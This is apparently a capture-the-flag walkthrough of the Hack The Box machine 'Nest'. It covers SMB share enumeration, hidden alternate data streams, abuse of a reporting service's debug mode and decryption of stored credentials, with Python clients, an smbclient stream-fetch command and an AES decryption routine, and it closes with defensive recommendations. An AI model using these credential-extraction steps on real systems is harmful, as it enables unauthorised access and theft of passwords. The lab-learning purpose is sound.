Walkthrough of the Nest machine on Hack The Box.
Recon
The primary exposure was SMB on TCP 445 plus a custom service on TCP 4386.
The banner on 4386 identified it as HQK Reporting Service V1.2, which accepts commands such as LIST, SETDIR, RUNQUERY and DEBUG.
That service became key later in the chain.
SMB enumeration
Anonymous/low-privilege share access revealed:
- Data (read)
- Users (read)
- Secure$ (later, with the TempUser credentials)
From share content, I collected:
- usernames
- config files with encrypted credentials
- references to internal files used by HQK tooling
Credential recovery path
RU_config.xml contained:
- username: c.smith
- an encrypted password blob
I pulled the related .NET application from the share and reversed/debugged it; because the decryption routine and the material it keys from ship inside the binary, stepping through it yielded the cleartext password the tool uses.
That password gave access to additional user data, including the C.Smith directory.
Alternate data stream discovery
In C.Smith\HQK Reporting, Debug Mode Password.txt appeared empty (zero bytes) on a normal listing.
Using smbclient's allinfo command, which prints the NTFS stream metadata for a file, I identified an alternate data stream:
Debug Mode Password.txt:Password
Reading that stream exposed the HQK debug password.
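The stream check above, as an added example that is not part of the original walkthrough: it parses the stream lines that smbclient's allinfo prints, flags the "looks empty but carries a named stream" case, and builds the smbclient get command for pulling the stream (the file:stream syntax is what smbclient accepts). The allinfo text is a constructed sample modeled on smbclient output; the credentials in the argv builder are placeholders.

```python
import re

# Constructed sample modeled on smbclient's `allinfo` output for a file whose
# default stream is empty but which carries a named alternate data stream.
SAMPLE_ALLINFO = """\
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 06:06:12 PM 2019 BST
access_time:    Thu Aug  8 06:06:12 PM 2019 BST
write_time:     Thu Aug  8 06:08:17 PM 2019 BST
change_time:    Wed Jul 21 07:47:12 PM 2021 BST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
"""

# smbclient prints one line per NTFS stream: "stream: [:<name>:$DATA], <n> bytes".
# The unnamed default stream (what a normal `ls`/`get` sees) shows up as "[::$DATA]".
STREAM_RE = re.compile(
    r"^stream:\s*\[:(?P<name>[^:\]]*):\$DATA\],\s*(?P<size>\d+)\s+bytes", re.M
)


def parse_streams(allinfo_text):
    """Return {stream_name: size_in_bytes}; the default stream has the key ''."""
    return {m["name"]: int(m["size"]) for m in STREAM_RE.finditer(allinfo_text)}


def named_streams(allinfo_text):
    """Names of every alternate data stream on the file (default stream excluded)."""
    return [name for name in parse_streams(allinfo_text) if name]


def looks_empty_but_has_ads(allinfo_text):
    """True when a casual review would call the file empty yet data hides in an ADS."""
    streams = parse_streams(allinfo_text)
    return streams.get("", 0) == 0 and bool(named_streams(allinfo_text))


def smbclient_get_stream(share_url, user, password, filename, stream_name, local_path):
    """argv that pulls one named stream; smbclient understands "file:stream" in get."""
    return [
        "smbclient", share_url, "-U", f"{user}%{password}",
        "-c", f'get "{filename}:{stream_name}" "{local_path}"',
    ]


if __name__ == "__main__":
    for name in named_streams(SAMPLE_ALLINFO):
        print("hidden stream:", name, "empty-looking file:", looks_empty_but_has_ads(SAMPLE_ALLINFO))
        print(" ".join(smbclient_get_stream("//10.10.10.178/Users", "C.Smith", "<password>",
                                            "Debug Mode Password.txt", name, "debug_password.txt")))
```

On the Windows side the same streams are visible with `dir /R` or `Get-Item -Path <file> -Stream *`, which is the check a defender can script across a share.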
HQK service abuse (port 4386)
Connecting to 4386 and entering debug mode unlocked extra commands like SHOWQUERY.
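A client for that interaction, added here as an example and not code from the original walkthrough: it reads prompt-terminated replies, enters debug mode, changes directory and dumps a query file. So that it runs offline, the block also contains a mock of the service on a loopback port; the mock's replies, directory name, query file and debug password are constructed placeholders, only the banner string and the command names come from the page.

```python
import socket
import socketserver
import threading

PROMPT = b">"

# ---- Constructed stand-in for the service; replies are illustrative, not captured ----
MOCK_DEBUG_PASSWORD = "debug-pass-placeholder"   # hypothetical value
MOCK_DIRS = {
    "ldap": {"1": ("Ldap.conf",
                   "Domain=example.local\r\nPort=389\r\n"
                   "BaseOu=OU=Users,DC=example,DC=local\r\n"
                   "User=Administrator\r\nPassword=BASE64BLOBPLACEHOLDER==")},
}


class MockHqkHandler(socketserver.StreamRequestHandler):
    def handle(self):
        debug, cwd = False, None
        self.wfile.write(b"HQK Reporting Service V1.2\r\n\r\n>")
        for raw in self.rfile:                      # one command per line
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "DEBUG":
                debug = arg == MOCK_DEBUG_PASSWORD
                reply = "Debug mode enabled. SHOWQUERY is now available" if debug else "Invalid password"
            elif verb == "SETDIR":
                if arg.lower() in MOCK_DIRS:
                    cwd, reply = arg.lower(), f"Current directory set to {arg}"
                else:
                    reply = "Error: Directory does not exist"
            elif verb == "LIST":
                entries = MOCK_DIRS.get(cwd, {})
                reply = "\r\n".join(f"[{qid}]   {name}" for qid, (name, _) in entries.items()) or "No queries"
            elif verb == "SHOWQUERY" and debug:   # gated behind debug mode, as on the target
                entry = MOCK_DIRS.get(cwd, {}).get(arg)
                reply = entry[1] if entry else "Invalid query number"
            else:
                reply = "Unrecognised command"
            self.wfile.write(reply.encode() + b"\r\n\r\n>")


# ---- Client side: the part you would point at the real 4386 ----
def recv_until_prompt(sock, timeout=5.0):
    """Read until the service's '>' prompt; return the reply text without the prompt."""
    sock.settimeout(timeout)
    buf = b""
    while not buf.rstrip().endswith(PROMPT):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.decode(errors="replace").rstrip().rstrip(">").strip()


def hqk_command(sock, line):
    sock.sendall(line.encode() + b"\r\n")
    return recv_until_prompt(sock)


def dump_query(host, port, debug_password, directory, query_id):
    """Enter debug mode, move to a directory and return (LIST output, SHOWQUERY output)."""
    with socket.create_connection((host, port)) as s:
        if "HQK Reporting Service" not in recv_until_prompt(s):
            raise RuntimeError("unexpected banner")
        if "Debug mode enabled" not in hqk_command(s, f"DEBUG {debug_password}"):
            raise PermissionError("debug password rejected")
        hqk_command(s, f"SETDIR {directory}")
        listing = hqk_command(s, "LIST")
        content = hqk_command(s, f"SHOWQUERY {query_id}")
        return listing, content


def run_demo(password=MOCK_DEBUG_PASSWORD):
    """Start the mock on a free loopback port, drive it with the client, return its results."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), MockHqkHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return dump_query("127.0.0.1", server.server_address[1], password, "ldap", "1")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    listing, content = run_demo()
    print(listing)
    print(content)
```

Against the real host you call dump_query with the target address, the debug password read from the alternate stream, and the directory and query ID taken from LIST output.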
By browsing directories and showing query content, I recovered LDAP config values including:
- domain context
- an Administrator account reference
- an encrypted password blob
I then repeated the same reverse/debug approach used earlier to decrypt the final credential material.
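The decryption step used for both the RU_config.xml blob and the LDAP blob, as an added example rather than the walkthrough's own code: once the reversed binary gives up its passphrase, salt, IV, iteration count and key size, the blob decrypts offline with no further access to the tool. The example assumes the pattern common in .NET tooling, Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1) feeding AES-CBC with PKCS7 padding; the constants are placeholders, not values from the machine, and the encrypt routine is included only so the demo has a blob to recover. It uses the third-party cryptography package.

```python
import base64
import hashlib

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Placeholder constants standing in for whatever the target binary hardcodes.
# Hypothetical values; substitute what the debugger shows for the real tool.
PASSPHRASE = "placeholder-passphrase"
SALT = "12345678"          # .NET code typically does Encoding.ASCII.GetBytes(salt)
IV = "0123456789ABCDEF"    # 16 ASCII bytes = one 128-bit AES block
ITERATIONS = 1000
KEY_BITS = 256


def derive_key(passphrase=PASSPHRASE, salt=SALT, iterations=ITERATIONS, key_bits=KEY_BITS):
    """Rfc2898DeriveBytes(passphrase, salt, iterations).GetBytes(key_bits / 8) is PBKDF2-HMAC-SHA1."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), salt.encode(),
                               iterations, dklen=key_bits // 8)


def decrypt_blob(b64_blob, passphrase=PASSPHRASE, salt=SALT, iv=IV,
                 iterations=ITERATIONS, key_bits=KEY_BITS):
    """Decrypt a base64 AES-CBC/PKCS7 blob exactly as the client tool would."""
    key = derive_key(passphrase, salt, iterations, key_bits)
    dec = Cipher(algorithms.AES(key), modes.CBC(iv.encode())).decryptor()
    padded = dec.update(base64.b64decode(b64_blob)) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return (unpad.update(padded) + unpad.finalize()).decode()


def encrypt_blob(plaintext, passphrase=PASSPHRASE, salt=SALT, iv=IV,
                 iterations=ITERATIONS, key_bits=KEY_BITS):
    """The tool's encrypt side, reproduced so the demo has a config blob to recover."""
    key = derive_key(passphrase, salt, iterations, key_bits)
    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext.encode()) + pad.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv.encode())).encryptor()
    return base64.b64encode(enc.update(padded) + enc.finalize()).decode()


if __name__ == "__main__":
    # Constructed blob: what a config file would carry for this placeholder password.
    blob = encrypt_blob("s3cret-service-password")
    print("config blob:", blob)
    print("recovered  :", decrypt_blob(blob))
```

The point the example makes is that nothing here is secret: a debugger breakpoint on the decrypt call, or the constants lifted from the assembly, is all an attacker needs, which is why the takeaway below calls this reversible storage rather than encryption.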
Privileged outcome
With the recovered Administrator credentials, I gained privileged access and retrieved the final flag.
Key takeaways
- Readable SMB shares often leak enough context for full compromise.
- App-level “encrypted” credentials are not secure if decryption logic ships with the client.
- Alternate data streams can hide critical secrets from casual file review.
- Internal custom services with debug features are high-risk when weakly protected.
Defensive recommendations
- Minimize anonymous/guest SMB exposure and enforce least privilege on shares.
- Remove reversible credential storage from desktop/service tooling.
- Monitor for ADS usage and unusual SMB file stream access patterns.
- Disable or strictly gate debug functionality in production services.